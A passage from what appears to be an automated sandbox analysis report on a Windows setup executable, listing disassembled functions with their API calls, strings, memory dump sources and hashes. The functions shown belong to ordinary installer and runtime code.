                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValuememset
                                                                                              • String ID: $%s\%s$IsTest$MSFTInternal$Software\Microsoft\SQMClient$Software\Policies\Microsoft\SQMClient
                                                                                              • API String ID: 1830152886-857506278
                                                                                              • Opcode ID: e49faafd55b5bad72aba25d28bd8e59eb975db4b3106408241cb8379e3f6d8d2
                                                                                              • Instruction ID: 7cfe52dd5ae6b6a7605e3d9ff15ee608afd3e68795e3e7335656999662d0eb4f
                                                                                              • Opcode Fuzzy Hash: e49faafd55b5bad72aba25d28bd8e59eb975db4b3106408241cb8379e3f6d8d2
                                                                                              • Instruction Fuzzy Hash: CC31A3B094131CAADB10DB188C88FDAB7BCEB54348F1205E5A518E2651D770AE858FA9
                                                                                              Function 6C5D9C65 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6C5D9CB8
                                                                                              • LoadLibraryA.KERNEL32(?), ref: 6C5D9CEB
                                                                                              • InterlockedCompareExchange.KERNEL32(00000000,00000000,00000000), ref: 6C5D9D02
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressCompareExchangeInterlockedLibraryLoadProc
                                                                                              • String ID: $
                                                                                              • API String ID: 792202920-3993045852
                                                                                              • Opcode ID: 9fd410078508ca714adfe0aa4df8dcfe0b01ef4f47985d1eb5ad993435446cda
                                                                                              • Instruction ID: d3ba9d27328f67a7e26c732e99191044bbc7f15291320348402759b72febacb4
                                                                                              • Opcode Fuzzy Hash: 9fd410078508ca714adfe0aa4df8dcfe0b01ef4f47985d1eb5ad993435446cda
                                                                                              • Instruction Fuzzy Hash: F3319E76A00304EFCB10DF59CC84B9ABBB5AF88315F268419E805AB650DB70F540CB98
                                                                                              Function 6395F6DE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$H_prolog3_Version
                                                                                              • String ID: Z$rtf
                                                                                              • API String ID: 3297208538-589749439
                                                                                              • Opcode ID: 0ab49880ae6c9db1e92e26938c5bc11897aac1f60499000b9a12976ec296923e
                                                                                              • Instruction ID: 08af1b8ec925619d6aaeea887e20d34501d2fc65cba8d92c3e78559d5b58fe36
                                                                                              • Opcode Fuzzy Hash: 0ab49880ae6c9db1e92e26938c5bc11897aac1f60499000b9a12976ec296923e
                                                                                              • Instruction Fuzzy Hash: AB3147B0901714CFEB71CF28C84069AB7F8BF0CB14F00495EE19A86640E770E694CF95
                                                                                              Function 6C5D3292 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6C5D329D
                                                                                              • VirtualFree.KERNEL32(?,?,00004000,00000000,?,6C5D3279,?,6C5D3238,00000000,?,?,00000000,00000000,?), ref: 6C5DB502
                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,6C5D3279,?,6C5D3238,00000000,?,?,00000000,00000000,?), ref: 6C5DB511
                                                                                              • ctype.LIBCPMT ref: 6C5DB52F
                                                                                              • ctype.LIBCPMT ref: 6C5DB549
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeVirtualctype$DecrementInterlocked
                                                                                              • String ID:
                                                                                              • API String ID: 2528146720-0
                                                                                              • Opcode ID: c892f3d31ad6450e06aa055539de012177b7c4aa7e316afcca448243088974df
                                                                                              • Instruction ID: 41fab7ee4e1d6c6be93d0e72c59eb558a0a729933651cb097c84319f8e8905be
                                                                                              • Opcode Fuzzy Hash: c892f3d31ad6450e06aa055539de012177b7c4aa7e316afcca448243088974df
                                                                                              • Instruction Fuzzy Hash: B411E270600706EFDB209F99CCC0A5AB7F9EF44344B22882DE15A93A41DB70FC01CB58
                                                                                              Function 63951B63 Relevance: 10.6, APIs: 7, Instructions: 62windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63951B6A
                                                                                              • GetParent.USER32(00000065), ref: 63951B80
                                                                                                • Part of subcall function 6394F415: GetDlgItem.USER32(?,00003024), ref: 6394F479
                                                                                                • Part of subcall function 6394F415: GetWindowLongW.USER32(00000000,000000EB), ref: 6394F484
                                                                                                • Part of subcall function 6394F415: SetWindowLongW.USER32(00000000,000000EB,00000001), ref: 6394F4C4
                                                                                              • PostMessageW.USER32(00000065,00000028,00000000,00000000), ref: 63951BDF
                                                                                              • SetWindowLongW.USER32(00000065,000000F4,00000065), ref: 63951BE7
                                                                                              • GetParent.USER32(00000065), ref: 63951BF2
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 63951BFA
                                                                                              • PostMessageW.USER32(00000065,000006F5,00000000,00000000), ref: 63951C0B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long$MessageParentPost$H_prolog3ItemText
                                                                                              • String ID:
                                                                                              • API String ID: 870142269-0
                                                                                              • Opcode ID: 2230bd172105746f44140bf67670935054b9e6e455d6c339116bab6b9c7b28b6
                                                                                              • Instruction ID: ff6fccdd37d04db44e9c4f6dbe9e3ef91d90b27dcf5997b4537c34cd0efb566b
                                                                                              • Opcode Fuzzy Hash: 2230bd172105746f44140bf67670935054b9e6e455d6c339116bab6b9c7b28b6
                                                                                              • Instruction Fuzzy Hash: 47216375600206EFDB11EFA4CC88B99B7F9FF05B48F100525F25597191DB71A865CF80
                                                                                              Function 639530B1 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 63966041: __EH_prolog3.LIBCMT ref: 63966048
                                                                                                • Part of subcall function 63966041: GetCommandLineW.KERNEL32(0000001C,639530C2,?), ref: 6396604D
                                                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,?,?), ref: 63953136
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CommandExceptionH_prolog3LineRaise
                                                                                              • String ID: CreateLayout$Install$Repair$Uninstall$UninstallPatch
                                                                                              • API String ID: 683617612-791770018
                                                                                              • Opcode ID: 333b0aa4255d359c360ef78369b28e959f2e1b3d93fb5a8105961fb916531dd3
                                                                                              • Instruction ID: 5168bcef98cb5badf4ed1ee0a6fce25311687d954dc7f3e4d83ac7f2b5a449ec
                                                                                              • Opcode Fuzzy Hash: 333b0aa4255d359c360ef78369b28e959f2e1b3d93fb5a8105961fb916531dd3
                                                                                              • Instruction Fuzzy Hash: 2701B533148748A7DA20DA39CD81F467759DB81FB8F194015FA548B241CB32D4F18F61
                                                                                              Function 6395FB4F Relevance: 10.6, APIs: 7, Instructions: 53windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395FB56
                                                                                              • GetParent.USER32(00000001), ref: 6395FB6B
                                                                                              • SendMessageW.USER32(00000000,00000481,00000001,00000000), ref: 6395FB78
                                                                                              • GetParent.USER32(00000001), ref: 6395FBB5
                                                                                              • SendMessageW.USER32(00000000,0000047E,?,?), ref: 6395FBC1
                                                                                              • GetParent.USER32(00000001), ref: 6395FBD3
                                                                                              • SendMessageW.USER32(00000000,00000480,?,?), ref: 6395FBDF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageParentSend$H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 1482283565-0
                                                                                              • Opcode ID: 9fa2bda6f9f4ca3695e6e6e030af10893504dea16679fae5f1a967c637d3f58c
                                                                                              • Instruction ID: 959c9bf678e25ee4366270c28c9c3ba87b5e7193be69cf779a4bdeb2ef28e42a
                                                                                              • Opcode Fuzzy Hash: 9fa2bda6f9f4ca3695e6e6e030af10893504dea16679fae5f1a967c637d3f58c
                                                                                              • Instruction Fuzzy Hash: 5A110471500709EFDB21EF64CC49B9EB7B6BF02B68F048914F1656A6A0C774E9A5CF40
                                                                                              Function 6394EE95 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6394EE9C
                                                                                              • FreeLibrary.KERNEL32(00000000,0000000C,63965B81,?,?,?), ref: 6394EED4
                                                                                              • LoadLibraryW.KERNEL32(?,0000000C,63965B81,?,?,?), ref: 6394EEE8
                                                                                              • GetLastError.KERNEL32(00000000), ref: 6394EF03
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6394EF35
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$ErrorException@8FreeH_prolog3LastLoadThrow
                                                                                              • String ID: LoadLibrary
                                                                                              • API String ID: 3026435860-2077302977
                                                                                              • Opcode ID: a3ef2e548b7786846fa45497d6b9b769ad0441d60ee0e2a658b9e343fbb4c73e
                                                                                              • Instruction ID: c7e70b4bf969fb0d733dab7e994b2c730314117e4845e5db101d01a551ae35e2
                                                                                              • Opcode Fuzzy Hash: a3ef2e548b7786846fa45497d6b9b769ad0441d60ee0e2a658b9e343fbb4c73e
                                                                                              • Instruction Fuzzy Hash: 60115E71905309DFEB11EF68C589B9EBBB8AF15B28F148154F8189F286C770DA14CFA1
                                                                                              Function 6395B6A5 Relevance: 10.5, APIs: 7, Instructions: 44windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6394E389: GetParent.USER32 ref: 6394E390
                                                                                                • Part of subcall function 6394E389: PostMessageW.USER32(00000000,00000470,00000000,?), ref: 6394E3A1
                                                                                                • Part of subcall function 6394E36B: GetParent.USER32(?), ref: 6394E36D
                                                                                                • Part of subcall function 6394E36B: SendMessageW.USER32(00000000,0000046B,00000000,00000000), ref: 6394E37D
                                                                                              • GetParent.USER32(00000069), ref: 6395B6D1
                                                                                              • GetSystemMenu.USER32(00000000,00000000,0000F060,00000000,?,?,00000000,639620A8,00000001,?,63962023,?,000006F5,?,?,?), ref: 6395B6DD
                                                                                              • EnableMenuItem.USER32(00000000), ref: 6395B6E4
                                                                                              • SetWindowLongW.USER32(00000069,000000F4,00000069), ref: 6395B6F0
                                                                                              • GetParent.USER32(00000069), ref: 6395B6FB
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 6395B6FF
                                                                                              • PostMessageW.USER32(00000069,000006F5,00000000,00000000), ref: 6395B710
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Parent$Message$MenuPostWindow$EnableItemLongSendSystemText
                                                                                              • String ID:
                                                                                              • API String ID: 2729316450-0
                                                                                              • Opcode ID: a90fa06a61a015b3254a74af035c2212b1dd7e4ed897549361391f3a2146a9ca
                                                                                              • Instruction ID: 67c1de841c835d5d58be5f1efe3eea117d38099652445163c4e6fcd3a22cf8e9
                                                                                              • Opcode Fuzzy Hash: a90fa06a61a015b3254a74af035c2212b1dd7e4ed897549361391f3a2146a9ca
                                                                                              • Instruction Fuzzy Hash: F5016D75244200BFEB20BBA5CC48F197BA9FB46B54F200410F240DB591D771A8218F88
                                                                                              Function 63964ECE Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63964ED5
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Eula$None$Progress Page$SystemRequirement$Welcome
                                                                                              • API String ID: 431132790-1170989405
                                                                                              • Opcode ID: d829e41b2d7f5e472e19e66a05fb5a991663cb501d6351a966740d6815b9041a
                                                                                              • Instruction ID: aaab98782e6055e0709417ded815f70f699b63ae92bd09099e215e9b8eb61957
                                                                                              • Opcode Fuzzy Hash: d829e41b2d7f5e472e19e66a05fb5a991663cb501d6351a966740d6815b9041a
                                                                                              • Instruction Fuzzy Hash: E301A4F1A0230487AF11DFE8489007EB1A9AF9BD64BAA051AF150CB251C730CD02DF81
                                                                                              Function 63969AA9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,63977FA8,00000008,63969BB6,00000000,00000000,?,6396B575,63969054,?,?,639691D6,?), ref: 63969ABA
                                                                                              • __lock.LIBCMT ref: 63969AEE
                                                                                                • Part of subcall function 6396EA00: __mtinitlocknum.LIBCMT ref: 6396EA16
                                                                                                • Part of subcall function 6396EA00: __amsg_exit.LIBCMT ref: 6396EA22
                                                                                                • Part of subcall function 6396EA00: EnterCriticalSection.KERNEL32(639691D6,639691D6,?,63969AF3,0000000D), ref: 6396EA2A
                                                                                              • InterlockedIncrement.KERNEL32(83EC8B55), ref: 63969AFB
                                                                                              • __lock.LIBCMT ref: 63969B0F
                                                                                              • ___addlocaleref.LIBCMT ref: 63969B2D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                              • String ID: KERNEL32.DLL
                                                                                              • API String ID: 637971194-2576044830
                                                                                              • Opcode ID: 082f556e15c90d1bc2a7ab817fac5a47227d2da3cf024c697bc1ea98d701b47b
                                                                                              • Instruction ID: 660dfb9aeecbae2082d393e432b22b24226b8faaa44ab1bbe2079d209412818d
                                                                                              • Opcode Fuzzy Hash: 082f556e15c90d1bc2a7ab817fac5a47227d2da3cf024c697bc1ea98d701b47b
                                                                                              • Instruction Fuzzy Hash: 86016D71806B01AEF720DF65D94474AFBF0AF56B68F20890ED49697290CB70EA40CF14
                                                                                              Function 6397288F Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __getptd.LIBCMT ref: 639728B0
                                                                                                • Part of subcall function 63969BE0: __getptd_noexit.LIBCMT ref: 63969BE3
                                                                                                • Part of subcall function 63969BE0: __amsg_exit.LIBCMT ref: 63969BF0
                                                                                              • __getptd.LIBCMT ref: 639728C1
                                                                                              • __getptd.LIBCMT ref: 639728CF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                              • String ID: MOC$RCC$csm
                                                                                              • API String ID: 803148776-2671469338
                                                                                              • Opcode ID: c95cb452513ca19a93679836afc226ef36163cfd16b51e0311ae908c2184dada
                                                                                              • Instruction ID: 52ccf8b34fe6be199a4585349706aba3ab425332e65ab83197959d0c55e54485
                                                                                              • Opcode Fuzzy Hash: c95cb452513ca19a93679836afc226ef36163cfd16b51e0311ae908c2184dada
                                                                                              • Instruction Fuzzy Hash: 0DE012341282048FD7209774C09579833ECFF89B98F5914E5E45CCB3A2CB35E4908E52
                                                                                              Function 6C5D82AD Relevance: 9.2, APIs: 6, Instructions: 214COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5D82E7
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C5D82F8
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C5D8324
                                                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 6C5E0D27
                                                                                              • ctype.LIBCPMT ref: 6C5E0D8E
                                                                                                • Part of subcall function 6C5D7C62: memmove.MSVCRT(?,?,?,?,?,6C5D8320,00000000), ref: 6C5D7C93
                                                                                                • Part of subcall function 6C5DE3B3: EnterCriticalSection.KERNEL32(?,?,00000000,6C5D83DB,?), ref: 6C5DE3BD
                                                                                                • Part of subcall function 6C5DE3B3: ctype.LIBCPMT ref: 6C5DE3CC
                                                                                                • Part of subcall function 6C5DE3B3: LeaveCriticalSection.KERNEL32(?,?,00000000,6C5D83DB,?), ref: 6C5DE3EC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterLeavectype$ExceptionRaisememmovememset
                                                                                              • String ID:
                                                                                              • API String ID: 1998214256-0
                                                                                              • Opcode ID: 0827f9c953721f8cd43fad442b37ee44db180ab04209c350d345a411fdf4bc3e
                                                                                              • Instruction ID: 410892f303506308c51a4e534cd270f29b82f388331f718135a9fec6adc958a0
                                                                                              • Opcode Fuzzy Hash: 0827f9c953721f8cd43fad442b37ee44db180ab04209c350d345a411fdf4bc3e
                                                                                              • Instruction Fuzzy Hash: FD81AD30200380DFCB14DF58CD84E9A7BF5BBC9308F66449AE6698BAA0CB31E945DF44
                                                                                              Function 6C5E8316 Relevance: 9.2, APIs: 6, Instructions: 161COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?,00000000,?,?), ref: 6C5E8442
                                                                                              • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 6C5E8464
                                                                                              • GetLastError.KERNEL32 ref: 6C5E8488
                                                                                              • SetNamedSecurityInfoW.ADVAPI32(00000001,00000001,80000005,?,00000000,?,00000000), ref: 6C5E84B5
                                                                                              • GetLastError.KERNEL32 ref: 6C5E84FE
                                                                                              • LocalFree.KERNEL32(?), ref: 6C5E8527
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Security$DescriptorErrorLast$DaclFreeInfoLocalNamedOwner
                                                                                              • String ID:
                                                                                              • API String ID: 442303658-0
                                                                                              • Opcode ID: e1b71975f8727b4f3bab825058cacc4fa325fa138d223693f34041932b00c253
                                                                                              • Instruction ID: a30583fc26b3c69e13f0bd10709da5f3149cfb0863d6791cf07ec38621560159
                                                                                              • Opcode Fuzzy Hash: e1b71975f8727b4f3bab825058cacc4fa325fa138d223693f34041932b00c253
                                                                                              • Instruction Fuzzy Hash: C551BD30645258BBCB42CE48CC44F9A3BB9FB49319F650057F920EA962DB71DA85CF92
                                                                                              Function 6C5D8067 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 101COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5D8097
                                                                                                • Part of subcall function 6C5D18E5: _vsnwprintf.MSVCRT ref: 6C5D1913
                                                                                                • Part of subcall function 6C5D3E29: RegOpenKeyExW.ADVAPI32(?,?,00000000,-00020018,00000000,80000002,CEIPEnable,00000002), ref: 6C5D3E94
                                                                                                • Part of subcall function 6C5D3E29: RegQueryValueExW.ADVAPI32(00000000,00000002,00000000,?,?,00000004), ref: 6C5D3EB0
                                                                                                • Part of subcall function 6C5D3E29: RegCloseKey.ADVAPI32(00000000), ref: 6C5D3ECE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
